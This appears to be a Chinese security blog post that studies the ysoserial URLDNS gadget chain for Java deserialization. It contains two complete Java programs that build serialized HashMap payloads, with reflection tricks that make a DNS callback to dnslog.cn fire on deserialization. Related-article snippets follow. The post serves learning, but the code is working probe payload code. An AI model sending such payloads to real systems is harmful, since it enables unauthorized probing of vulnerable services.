dnsurl 链

已于 2022-02-13 16:27:07 修改
阅读量168 收藏
点赞数
分类专栏: 安全技术 文章标签: java 哈希算法 开发语言
于 2022-02-13 16:08:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lylong0703/article/details/122909677
版权

学习链接
https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java

链结构

  • Gadget Chain:
  • HashMap.readObject()

  •   HashMap.putVal()

  •     HashMap.hash()

  •       URL.hashCode()

原链

package org.example.dnsurl;

import java.io.*;
import java.lang.reflect.Field;
import java.net.*;
import java.util.HashMap;
import java.util.Map;

public class dd1h {
    public static StringBuffer Httpget(String urli) throws IOException {
        StringBuffer sb = new StringBuffer();
        URL url = new URL(urli);
        InputStream in = url.openStream();
        BufferedInputStream br = new BufferedInputStream(in);
        byte[] k = new byte[2048];
        int r = 1;
        while (r!=-1){
            r = br.read(k);
            sb.append(new String(k));
        }
        return sb;
    }

    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

    public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {


        URLStreamHandler handler = new SilentURLStreamHandler();
        URL url = new URL(null,"http://4bpeqy.dnslog.cn",handler);
//        url.hashCode();
        Map<Object,Object> mp = new HashMap<>();
        mp.put(url,"y");
//        hash(Object key)
        Class cls = url.getClass();
        Field field = cls.getDeclaredField("hashCode");
        field.setAccessible(true);
        field.set(url,-1);


        serialize(mp);
//        unserialize("ser.bin");

    }
    static class SilentURLStreamHandler extends URLStreamHandler {

        protected URLConnection openConnection(URL u) throws IOException {
            return null;
        }

        protected synchronized InetAddress getHostAddress(URL u) {
            return null;
        }
    }
}

绕过触发
使用了一个自定义类


    static class SilentURLStreamHandler extends URLStreamHandler {

        protected URLConnection openConnection(URL u) throws IOException {
            return null;
        }

        protected synchronized InetAddress getHostAddress(URL u) {
            return null;
        }
    }

最后还要反射修改hash值

        Class cls = url.getClass();
        Field field = cls.getDeclaredField("hashCode");
        field.setAccessible(true);
        field.set(url,-1);

diy链

package org.example.dnsurl;

import java.io.*;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.util.Map;

public class dd1h2 {
    public static StringBuffer Httpget(String urli) throws IOException {
        StringBuffer sb = new StringBuffer();
        URL url = new URL(urli);
        InputStream in = url.openStream();
        BufferedInputStream br = new BufferedInputStream(in);
        byte[] k = new byte[2048];
        int r = 1;
        while (r!=-1){
            r = br.read(k);
            sb.append(new String(k));
        }
        return sb;
    }

    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

    public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {


        URL url = new URL("http://qi77bp.dnslog.cn");

        Class cls = url.getClass();
        Field field = cls.getDeclaredField("hashCode");
        field.setAccessible(true);
        field.set(url,1234);

//        url.hashCode();
        Map<Object,Object> mp = new HashMap<>();
        mp.put(url,"y");
//        hash(Object key)

        field.setAccessible(true);
        field.set(url,-1);


        serialize(mp);
//        unserialize("ser.bin");

    }


}

通过前后两次修改hash值避免触发
在这里插入图片描述

_+felkdv
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java url dns_JAVA反序列化之URLDNS分析
weixin_34093899的博客
02-13 246
前言从之前shiro、fastjson等反序列化漏洞刚曝出的时候,就接触ysoserial的工具利用了,不过这么久都没好好去学习过其中的利用,这次先从其中的一个可以说是最简单的利用URLDNS开始学起。分析复制到IDEA中,并导入ysoserial的jar包,当然也可以直接构建生成整个ysoserial项目,然后找到对应的java文件进行调试。先看下整体代码:public class URLD...
Java安全——URLDNS利用
qq_51663706的博客
09-06 1126
URLDNS利用
java url dns_Java安全之URLDNS
weixin_39918084的博客
02-13 158
Java安全之URLDNS0x00 前言在学习Java的反序列化漏洞的时候,就不得不学习他的一个利用。很多刚刚入门的对于利用这个词可能比较陌生。那么这里先来了解一下Java反序列化和反序列化漏洞的一个产生。0x01 Java反序列化Java提供了一种对象序列化的机制,用一个字节序列表示一个对象,该字节包含对象的数据、对象的类型、对象的存储属性。字节序列写出到文件后,相当于可以持久报错了一个对...
网络安全最全Java安全 URLDNS分析(1),2024年最新2024年这些高频面试知识点最后再发一次
最新发布
2401_84254530的博客
05-09 226
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。,从而到下一步DNS解析,然后 hashCode属性被赋值为这个URL解析的哈希值,从而为一个很长的正数,从而不为 -1,然后序列化的时候这个。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。
URLDNS分析
enhengzZ的博客
01-26 2026
ysoserial ysoserial 在idea构建好项目,添加依赖真是麻了,在其pom.xml上有几个依赖位置已经改变,需要手动导入jar包。。 项目准备好后,在pom.xml找到入口类 报错了,这是因为没有传入参数,我们分析URLDNS,在编辑配置里添加程序实参 URLDNS “http://r5z2ag.ceye.io” 可见执行成功 至此能获得序列化数据 URLDNS URLDNS是ysoserial序列化中比较简单的一个URLDNS的利用效果是只能触发一次dns请求,而不能去执行命
URL、域名、DNS
ZBraveHeart的博客
03-10 3981
1、URL   即Uniform Resource Locator,统一资源定位符,也叫做网址。是互联网用来标识主机的名字,该名字具有唯一性,层次性,字面意思可以标识主机的账号、功能、性质、所属的地区或组织、便于所有互联网用户记忆与使用,用于指明互联网主机的服务器及具体的网页位置,URL的构成策略与示例如下: URL示例: 上述URL的组成为 协议 ——http 服务器名(域名) ——www.ocp.org 目录 ——protocol 文件 ——index.html
C++网络爬虫项目
07-04
取服务器的IP地址,构造DnsUrl对象压入解析统一资源定位符队列。 2.3.2. 发送线程(SendThread) 通过WebCrawler对象启动新的抓取任务,从解析统一资源定位符队列中弹出 DnsUrl对象,向HTTP服务器发送HTTP请求,并将套...
dns解析URL过程
magicfly9527的专栏
07-18 4387
dns解析URL
URL,域名,DNS,域名解析
竹毛言己
05-18 1622
文章目录基础知识URLURL是什么URL的作用URL的命名规则DNSDNS是什么DNS存在的意义DNS的域名层次结构DNS与域名服务器域名解析推荐阅读 基础知识 互联网上的所有数据都存储在主机(服务器)上。例如从网站上下载电影,电影的数据从哪里来的呢,资源是被存储到我们下载时候访问的主机上。 互联网上所有的主机都有唯一的IP地址,并通过此IP可以找到对应的主机。 互联网上任意两台主机之间的通信都是基于IP地址实现的。 通过域名访问另一台主机时,实际上将域名解析成了对应的IP地址,通过IP地址找到对方。 UR
URL,DNS和IP是什么?
buruyang的博客
10-05 1832
URL 包含哪几部分,每部分分别有什么作用? URL全称:Uniform Resource Location 译为:统一资源定位符; 这个URL 包括:协议部分、域名、端口、路径(虚拟路径)、携带的参数、哈希值; http://www.jianshu.com/index.html?name=oldUath&age=25#dowell 协议 域名 路径 ?查询参数 #锚点 协议部分: 该URL的协议部分为“http:”
ios系统中各种设置项的url
ji5ji的专栏
11-13 474
原文地址:ios系统中各种设置项的url接作者:子木潇雨ios系统中各种设置项的url接   在代码中调用如下代码: NSURL*url=[NSURL URLWithString:@"prefs:root=WIFI"]; [[UIApplication sharedApplication] openURL:url]; 即可跳转到设置页面的对应项。 [font=] About — prefs:
Java安全 URLDNS分析
Elite的博客
02-12 1698
URLDNSJava安全中比较简单的一条利用,无需使用任何第三方库,全依靠Java内置的一些类实现,理解好URLDNS,那么接下来对CC的学习就会简单许多。
ip地址、域名、DNSURL的区别与联系
DX_13146725375的博客
08-22 1745
IP:每个连接到Internet上的主机都会分配一个IP地址,此ip是该计算机在互联网上的逻辑地址的唯一标识,计算机之间的访问就是通过IP地址来进行的。写法:十进制的形式,用“.”分开,叫做“点分十进制表示法”,如:127.0.0.1。IP地址采用二进制的形式表示的话很长,比较麻烦,为了便于使用,IP地址经常被写成十进制的形式。 域名:ip是数字标识,使用时不好记忆和书写,因此在将IP...
java url dns_Java反序列化之URLDNS分析
weixin_42504279的博客
02-24 760
预备知识Java反序列化会调用对应的readobject方法比如我创建一个类test。序列化test类就会调用writeobject方法,反序列化就会调用test类的readobject方法。默认是存在的。可以重写readobject方法子分析在HashMap中。存在readobject方法。最后会调用hash(key)然后hash(key)又会调用key.hashCode方法而URL类又存在一...
详解DNS服务、DNS解析、DNS劫持和污染
XavierJ的博客
03-14 3300
简介 DNS(全称:Domain Name System,中文:域名系统)是互联网的一项服务。它作为将域名和 IP 地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。1 前言 要想弄清楚 DNS,必须先将域名和 IP 搞清楚。域名是什么?IP 又是什么?以百度的网站为例,域名就是 www.baidu.com,我们都很熟悉了,但想必很少人知道百度的 IP。打开浏览器的审查元素,可以看到百度的 IP 是 220.181.38.149:443。 其实我们浏览的网页是 IP 地址对应的远程服务器响应给我
ip地址、域名、DNSURL(即网址)的区别与联系
热门推荐
Paranoidyang的博客
01-09 3万+
1.IP地址:每个连接到Internet上的主机都会分配一个IP地址,IP地址是用来唯一标识互联网上计算机的逻辑地址,机器之间的访问就是通过IP地址来进行的。IP地址采用二进制的形式表示的话很长,比较麻烦,为了便于使用,IP地址经常被写成十进制的形式,用“.”分开,叫做“点分十进制表示法”,如:127.0.0.1。2.域名:IP地址毕竟是数字标识,使用时不好记忆和书写,因此在IP地址的基础上又发展出
网址(url),域名,ip地址,dns,hosts之间的关系
weixin_30558305的博客
04-12 1821
什么是ip? 我们知道,在Internet上有千百万台主机,为了区分这些主机,人们给每台主机都分配了一个专门的地址,称为IP地址。通过IP地址就可以访问到每一台主机。 IP地址由4部分数字组成,每部分都不大于256,各部分之间用小数点分开。例如“百度搜索”主机的IP地址就是:“119.75.217.109,”在浏览器上输入这个IP地址,就可以访问到百度的主页。 我们的每个虚拟主机用...
域名,网站名和URL区别
至尊宝
04-20 2万+
要写一个正则表达式来验证输入域名是否有正确,一直以为例如http://www.baidu.com类似于这种才是网站域名,经过百度才发现自己的认知是错误的。 以下转载于百度经验:http://jingyan.baidu.com/article/2c8c281df0afd00008252aa7.html ===============================================
当你输入网址时都发生了什么(1)——URL解析与DNS
p744174529的博客
06-01 1424
最近做Java Web也有一段时间了,既然做网站,那么怎么能对访问网站的流程没有一个基本的呢,所以就整理了一下从输入网址并回车的到成功访问到网站的一个过程。 简单来说,访问网址的过程大致可以分为五步: 1.解析URL。 2.浏览器发起DNS查询请求。 3.浏览器与网站建立连接。 4.进行数据的请求和传输。 5.浏览器根据服务器发回的内容解析并渲染页面。 这篇文章中我先介绍第一
DNS解析的具体过程?URL和域名有什么区别?
weixin_44589540的博客
05-01 348
1.DNS解析的具体过程 前置知识 主机向本地域名服务器一般采用递归查询(如果主机询问的本地域名服务器不知道被查询域名的IP地址,那么本地域名服务器代替该主机向其他根域名服务器继续查询,而不是让主机自己进行下一步的查询) 本地域名服务器向根域名服务器一般采用迭代查询(根域名服务器告诉本地域名服务器下一步应当向哪一个域名服务器进行查询,让它自己进行后续的查询,而不是代替它查询) 因此实际的查询是递归与迭代相结合的查询。 为了提高效率,每个域名服务器维护一个名字的高速缓存。当用户向域名服务器发起域名解析请求时,

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值